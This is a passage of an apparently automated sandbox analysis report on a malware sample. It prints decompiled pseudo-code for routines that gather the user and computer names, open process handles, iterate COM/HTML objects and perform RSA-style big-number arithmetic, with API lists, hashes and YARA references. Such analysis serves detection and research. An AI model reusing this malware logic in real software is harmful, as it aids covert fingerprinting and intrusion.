								 *0x75d284 =  *0x75d284 & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E007547D5();
						HeapFree( *0x75d270, 0, _t40);
						goto L10;
					}
					_t24 = E007544A4(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E00756109(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25);
				goto L5;
			}

0x0075577d
0x0075577d
0x00755780
0x00755781
0x0075578b
0x00755792
0x00755797
0x00755799
0x0075579f
0x007557c7
0x007557df
0x007557e1
0x007557e2
0x007557e4
0x00755822
0x00755822
0x00755828
0x0075582e
0x0075582e
0x007557e6
0x007557e9
0x007557ec
0x007557ef
0x007557fe
0x00755800
0x00755807
0x0075583b
0x0075583d
0x00755840
0x00755842
0x00755844
0x00755844
0x00000000
0x00755842
0x00755809
0x0075580e
0x0075581c
0x00000000
0x0075581c
0x007557d6
0x007557db
0x007557db
0x00000000
0x007557db
0x007557a9
0x00000000
0x00000000
0x007557b8
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 007557A1

Part of subcall function 00756109: GetTickCount.KERNEL32 ref: 0075611D
Part of subcall function 00756109: wsprintfA.USER32 ref: 0075616D
Part of subcall function 00756109: wsprintfA.USER32 ref: 0075618A
Part of subcall function 00756109: wsprintfA.USER32 ref: 007561B6
Part of subcall function 00756109: HeapFree.KERNEL32(00000000,?), ref: 007561C8
Part of subcall function 00756109: wsprintfA.USER32 ref: 007561E9
Part of subcall function 00756109: HeapFree.KERNEL32(00000000,?), ref: 007561F9
Part of subcall function 00756109: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00756227
Part of subcall function 00756109: GetTickCount.KERNEL32 ref: 00756238

RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 007557BF
HeapFree.KERNEL32(00000000,00000002,0075553A,?,0075553A,00000002,?,?,007553C9,?), ref: 0075581C

Strings

:Uu, xrefs: 007557E9
:Uu, xrefs: 0075583D

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$wsprintf$AllocateFree$CountTick
String ID: :Uu$:Uu
API String ID: 1676223858-486647572
Opcode ID: 3d074ab0eb8da535a3c936fc946510cfecf58fc767a304cb7a3368a9d6cb3b78
Instruction ID: dc650e997609cf68c292fe26277f6fb19e25c9af0f445bd08b00f1b2d4ebc541
Opcode Fuzzy Hash: 3d074ab0eb8da535a3c936fc946510cfecf58fc767a304cb7a3368a9d6cb3b78
Instruction Fuzzy Hash: 76215C71200305EBDB619F54DC84ADA37ACFB08352F104016FD02D7151EBF8AD499BA5

Uniqueness

Uniqueness Score: -1.00%

Function 6ED0E031, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED0E038
_Getvals.LIBCPMT ref: 6ED0E08A
_Mpunct.LIBCPMT ref: 6ED0E0C5
_Mpunct.LIBCPMT ref: 6ED0E0DF

Strings

$+xv, xrefs: 6ED0E0EA

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: Mpunct$GetvalsH_prolog3
String ID: $+xv
API String ID: 2204710431-1686923651
Opcode ID: 424649d532e19703fef1202d206298e69e9ea896dc6e5c94218b500891ab4f1a
Instruction ID: 7085c661cb8ac901f43ba55a76143b1ea70c8e9c50ac75fd7c04356db23463d5
Opcode Fuzzy Hash: 424649d532e19703fef1202d206298e69e9ea896dc6e5c94218b500891ab4f1a
Instruction Fuzzy Hash: AE21A7B1904B56AEDB21CFB5C4507BBBEFCAF09204F18091EE899C7A41D734D605CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED42B27, Relevance: 7.7, APIs: 5, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 6ED3F4F7: RtlAllocateHeap.NTDLL(00000000,?), ref: 6ED3F529

_free.LIBCMT ref: 6ED42C36
_free.LIBCMT ref: 6ED42C4D
_free.LIBCMT ref: 6ED42C6A
_free.LIBCMT ref: 6ED42C85
_free.LIBCMT ref: 6ED42C9C

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 050fbe4d33c72491962cdeb91faae50605225987fe730c3e16f90f0cb04aa83b
Instruction ID: 28cc97cdb33effd559029e24bc15e052e72ba91c09bec10027b17fa1c22e21ad
Opcode Fuzzy Hash: 050fbe4d33c72491962cdeb91faae50605225987fe730c3e16f90f0cb04aa83b
Instruction Fuzzy Hash: 4F51A372A00709EFDB50DFA9C880B9A77F8EF69718B144969E849DB250E731D941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0075137A, Relevance: 7.6, APIs: 5, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0075137A() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E007575F6(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E00754AAB(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x754565
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x00751388
0x0075138b
0x0075138e
0x00751394
0x00751399
0x0075139f
0x007513a7
0x007513aa
0x007513b0
0x007513b5
0x007513c2
0x007513cf
0x007513d3
0x007513d5
0x007513d9
0x007513dc
0x007513ec
0x0075143f
0x00751440
0x007513ee
0x007513f3
0x007513f4
0x007513f9
0x007513fc
0x0075140f
0x00000000
0x00751411
0x00751414
0x00751419
0x00751427
0x0075142a
0x00751430
0x00751435
0x00000000
0x00751437
0x00751437
0x0075143a
0x0075143a
0x00751435
0x0075140f
0x00751445
0x00751446
0x007513b5
0x0075144c

APIs

GetUserNameW.ADVAPI32(00000000,00754563), ref: 0075138E
GetComputerNameW.KERNEL32(00000000,00754563), ref: 007513AA

Part of subcall function 007575F6: RtlAllocateHeap.NTDLL(00000000,00000000,00754F70), ref: 00757602

GetUserNameW.ADVAPI32(00000000,00754563), ref: 007513E4
GetComputerNameW.KERNEL32(00754563,?), ref: 00751407
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00754563,00000000,00754565,00000000,00000000,?,?,00754563), ref: 0075142A

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: 392dc279aecd1c43597862a851f2883f282c9edf54790aed1a6c03559e4aef76
Instruction ID: efba82b986cd66a06d00b30344fa3f207cfea9ac35cbe9486a6ea2aab50d5663
Opcode Fuzzy Hash: 392dc279aecd1c43597862a851f2883f282c9edf54790aed1a6c03559e4aef76
Instruction Fuzzy Hash: E421FA76900248FFDB11DFE5C984DEEBBB9EF44302B54846AE901E7240DA749F49DB21

Uniqueness

Uniqueness Score: -1.00%

Function 6ED0E244, Relevance: 7.6, APIs: 5, Instructions: 73COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6ED0E24B
_Maklocstr.LIBCPMT ref: 6ED0E2B2
_Maklocstr.LIBCPMT ref: 6ED0E2C4
_Maklocchr.LIBCPMT ref: 6ED0E2DC
_Maklocchr.LIBCPMT ref: 6ED0E2EC

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: MaklocchrMaklocstr$H_prolog3_
String ID:
API String ID: 2404127365-0
Opcode ID: b56464b04aa01fbb86894940bc0f1fe2dc453c327163e6e59ccbd42b40184fdb
Instruction ID: f06fdc74e1505d7d5561e504bf01532486136ce529515b18bd4bee22546a8531
Opcode Fuzzy Hash: b56464b04aa01fbb86894940bc0f1fe2dc453c327163e6e59ccbd42b40184fdb
Instruction Fuzzy Hash: BD2105B5C00248AADF14DFE5D884ADEBBB8EF84704F04885AE9559F255EB70DA44CB70

Uniqueness

Uniqueness Score: -1.00%

Function 6ED067FA, Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

_Maklocstr.LIBCPMT ref: 6ED0681A
_Maklocstr.LIBCPMT ref: 6ED06837
_Maklocstr.LIBCPMT ref: 6ED06854
_Maklocchr.LIBCPMT ref: 6ED06866
_Maklocchr.LIBCPMT ref: 6ED06879

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: Maklocstr$Maklocchr
String ID:
API String ID: 2020259771-0
Opcode ID: f7269a8f74e2302ec4dee884fdd5b8159326fda15ee063607bc9b2c5fcb2e779
Instruction ID: 04f182c79fa0513ef2b8fb05df31a013b4466158a9ab36b3d06a00aa86c67d63
Opcode Fuzzy Hash: f7269a8f74e2302ec4dee884fdd5b8159326fda15ee063607bc9b2c5fcb2e779
Instruction Fuzzy Hash: 0D116DB1910745BFE620DFE59840B56B7ACAB04614F08892AF2648BA80D3B4F99087B4

Uniqueness

Uniqueness Score: -1.00%

Function 6ED4CEE5, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6ED4CEFD

Part of subcall function 6ED41434: HeapFree.KERNEL32(00000000,00000000,?,6ED4D1C0,?,00000000,?,?,?,6ED4D4C4,?,00000007,?,?,6ED4B43B,?), ref: 6ED4144A
Part of subcall function 6ED41434: GetLastError.KERNEL32(?,?,6ED4D1C0,?,00000000,?,?,?,6ED4D4C4,?,00000007,?,?,6ED4B43B,?,?), ref: 6ED4145C

_free.LIBCMT ref: 6ED4CF0F
_free.LIBCMT ref: 6ED4CF21
_free.LIBCMT ref: 6ED4CF33
_free.LIBCMT ref: 6ED4CF45

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2e178196f0d23bde22a3cdd23bfa2af76a561dc430d372035fa9f469cc404046
Instruction ID: 154cf7698f020a7f65d8d36d2435faa21ad70e358916e06900db5a32b64335cc
Opcode Fuzzy Hash: 2e178196f0d23bde22a3cdd23bfa2af76a561dc430d372035fa9f469cc404046
Instruction Fuzzy Hash: F1F06232616A0CDBEA80CBD8E4C0DD737DDAA22A147984C05F018DB581CB38F8848AA4

Uniqueness

Uniqueness Score: -1.00%

Function 00751A24, Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00751A24(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x75d2a4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x75d294 = _t4;
					_t6 = GetCurrentProcessId();
					 *0x75d290 = _t6;
					 *0x75d29c = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x75d28c = _t7;
					if(_t7 == 0) {
						 *0x75d28c =  *0x75d28c | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x00751a2c
0x00751a32
0x00751a39
0x00000000
0x00751a93
0x00751a3b
0x00751a43
0x00751a50
0x00751a50
0x00751a90
0x00000000
0x00751a90
0x00751a52
0x00751a52
0x00751a57
0x00751a69
0x00751a6e
0x00751a74
0x00751a7a
0x00751a81
0x00751a83
0x00751a83
0x00000000
0x00751a8a
0x00751a4c
0x00000000
0x00000000
0x00751a4e
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00752669,?,?,00000001,?,?,?,00751900,?), ref: 00751A2C
GetVersion.KERNEL32(?,00000001,?,?,?,00751900,?), ref: 00751A3B
GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,00751900,?), ref: 00751A57
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,00751900,?), ref: 00751A74
GetLastError.KERNEL32(?,00000001,?,?,?,00751900,?), ref: 00751A93

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 8a7d61079d9efbfee86334ca1674cb22d0dec783a30746f3b97ed5a8d5333794
Instruction ID: 813cea6ffacc898c7168ff35ce3bd0975065615aae006590af0f91ac43751404
Opcode Fuzzy Hash: 8a7d61079d9efbfee86334ca1674cb22d0dec783a30746f3b97ed5a8d5333794
Instruction Fuzzy Hash: D4F01974642302EFEA329B24AC197E93B65B704753F50C519E90ACA1E0E7FC8885DF1D

Uniqueness

Uniqueness Score: -1.00%

Function 6ECF6020, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 183COMMON

Download Yara Rule

APIs

_Smanip.LIBCPMTD ref: 6ECF61B7
_Smanip.LIBCPMTD ref: 6ECF6205
_Smanip.LIBCPMTD ref: 6ECF6228

Part of subcall function 6ECFA230: task.LIBCPMTD ref: 6ECFA2F6

Strings

., xrefs: 6ECF6190

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: Smanip$task
String ID: .
API String ID: 1925983085-248832578
Opcode ID: a97c972c9c40ef0f9f8abdeb1bcfab63964b84afc0063167a70cb347f599d148
Instruction ID: c8dc2c511e27316a5255ee91b4493f992cfdf3aa4c1d2bd55c952bb9da8f85b1
Opcode Fuzzy Hash: a97c972c9c40ef0f9f8abdeb1bcfab63964b84afc0063167a70cb347f599d148
Instruction Fuzzy Hash: BC815371910514DFDB88CF98CA90BEEB7B5FF46304F108559D206AB2C8E7396A4ADF50

Uniqueness

Uniqueness Score: -1.00%

Function 6ED0DF66, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED0DF6D

Part of subcall function 6ED067FA: _Maklocstr.LIBCPMT ref: 6ED0681A
Part of subcall function 6ED067FA: _Maklocstr.LIBCPMT ref: 6ED06837
Part of subcall function 6ED067FA: _Maklocstr.LIBCPMT ref: 6ED06854
Part of subcall function 6ED067FA: _Maklocchr.LIBCPMT ref: 6ED06866
Part of subcall function 6ED067FA: _Maklocchr.LIBCPMT ref: 6ED06879

_Mpunct.LIBCPMT ref: 6ED0DFFA
_Mpunct.LIBCPMT ref: 6ED0E014

Strings

$+xv, xrefs: 6ED0E01F

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: Maklocstr$MaklocchrMpunct$H_prolog3
String ID: $+xv
API String ID: 2939335142-1686923651
Opcode ID: eb412cc0ed620969a944d6eba974ec23ada887836cd075474fe564445fe5134e
Instruction ID: e538593f51de61ab16893b36891998a558b850fb8ce2a9f3818a1a6c0826dd0e
Opcode Fuzzy Hash: eb412cc0ed620969a944d6eba974ec23ada887836cd075474fe564445fe5134e
Instruction Fuzzy Hash: EF2195B1904B966FD721CFB5C45077BBEFCAB08208F18491EE499C7A41D734D605CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED16B83, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED16B8A
_Mpunct.LIBCPMT ref: 6ED16C17
_Mpunct.LIBCPMT ref: 6ED16C31

Strings

$+xv, xrefs: 6ED16C3C

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: Mpunct$H_prolog3
String ID: $+xv
API String ID: 4281374311-1686923651
Opcode ID: eedb6607136911bd50acd655cf85654b92df1c09ea6d7fada2f47d4a286edeb3
Instruction ID: 56941c8971af9cdd497ec77efe5615432cc6cd3ac806eeaa893f971c0b513332
Opcode Fuzzy Hash: eedb6607136911bd50acd655cf85654b92df1c09ea6d7fada2f47d4a286edeb3
Instruction Fuzzy Hash: 0E2183B1904A566ED721CFB4D8507BBBEFCAB08204F140A5AE4A9C7A41D734D605CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00753273, Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 007532AE
SysFreeString.OLEAUT32(00000000), ref: 00753393

Part of subcall function 00755920: SysAllocString.OLEAUT32(0075C2B0), ref: 00755970

SafeArrayDestroy.OLEAUT32(00000000), ref: 007533E6
SysFreeString.OLEAUT32(00000000), ref: 007533F5

Part of subcall function 00753D39: Sleep.KERNEL32(000001F4), ref: 00753D81

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: 93dc530f26498631c6c167480970940b6b55477e45b724d4c3b643cfc94c08c7
Instruction ID: 5600e1241a9ca0e1ee756cec207508fd6145b86096e16c9a47dd1af546d01c91
Opcode Fuzzy Hash: 93dc530f26498631c6c167480970940b6b55477e45b724d4c3b643cfc94c08c7
Instruction Fuzzy Hash: B8516536500609EFDB11CFA8C848ADEB7B5FF88781F148859E905DB260DBB9DE06CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00755920, Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00755920(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x75d2e0; // 0x25ca5a8
					_t5 = _t103 + 0x75e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x75c2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x75d2e0; // 0x25ca5a8
												_t28 = _t109 + 0x75e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x75d2e0; // 0x25ca5a8
														_t33 = _t79 + 0x75e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x00755925
0x0075592e
0x0075592f
0x00755933
0x00755939
0x0075593f
0x00755948
0x0075594e
0x00755958
0x0075595a
0x00755960
0x00755965
0x00755970
0x00755976
0x0075597b
0x00755a9d
0x00755981
0x00755981
0x0075598e
0x00755994
0x0075599a
0x0075599e
0x007559a4
0x007559b1
0x007559b5
0x007559bb
0x007559be
0x007559c6
0x007559c7
0x007559cb
0x007559cf
0x007559d2
0x007559d5
0x007559db
0x007559e4
0x007559ea
0x007559eb
0x007559ee
0x007559ef
0x007559f0
0x007559f8
0x007559f9
0x007559fa
0x007559fc
0x00755a00
0x00755a04
0x00000000
0x00000000
0x00755a0a
0x00755a13
0x00755a19
0x00755a23
0x00755a27
0x00755a29
0x00755a36
0x00755a3a
0x00755a42
0x00755a47
0x00755a59
0x00755a5b
0x00755a61
0x00755a61
0x00755a6a
0x00755a6a
0x00755a6c
0x00755a72
0x00755a72
0x00755a75
0x00755a7b
0x00755a7e
0x00755a87
0x00000000
0x00000000
0x00000000
0x00755a87
0x007559db
0x007559d5
0x007559be
0x00755a8d
0x00755a8d
0x00755a93
0x00755a93
0x00755a99
0x00755a99
0x00755aa2
0x00755aa8
0x00755aa8
0x00755965
0x00755ab1

APIs

SysAllocString.OLEAUT32(0075C2B0), ref: 00755970
lstrcmpW.KERNEL32(00000000,0076006F), ref: 00755A51
SysFreeString.OLEAUT32(00000000), ref: 00755A6A
SysFreeString.OLEAUT32(?), ref: 00755A99

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: b1807a56af03660704ca4fcec578350b21535e70059cfcdedd22ab60801bc2ac
Instruction ID: 6a62801183913aa98b132c1fdd9935a7e16ac3224cbcf915549d5135209ca59b
Opcode Fuzzy Hash: b1807a56af03660704ca4fcec578350b21535e70059cfcdedd22ab60801bc2ac
Instruction Fuzzy Hash: 39517E71D00619EFCB01DFA8C8989EEB7B5FF88701B148688E905EB210D775AE45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00757B30, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00757B30(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E007547C4(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E0075227C(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E00753C06(_t101,  &_v428, _a8, _t96 - _t81);
					E00753C06(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E0075227C(_t101, 0x75d168);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E0075227C(_a16, _a4);
						E00753450(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L0075AED0();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L0075AECA();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E00752420(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E00753F60(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E00752775(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x75d168 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x00757b33
0x00757b3f
0x00757b45
0x00757b4a
0x00757b4e
0x00757cc0
0x00757cc4
0x00757cc4
0x00757b54
0x00757b58
0x00757b5c
0x00757b5f
0x00757b6a
0x00757b70
0x00757b75
0x00757b78
0x00757b92
0x00757ba1
0x00757bad
0x00757bb7
0x00757bbc
0x00757bbe
0x00757bc1
0x00757c78
0x00757c7e
0x00757c8f
0x00757ca2
0x00757cb8
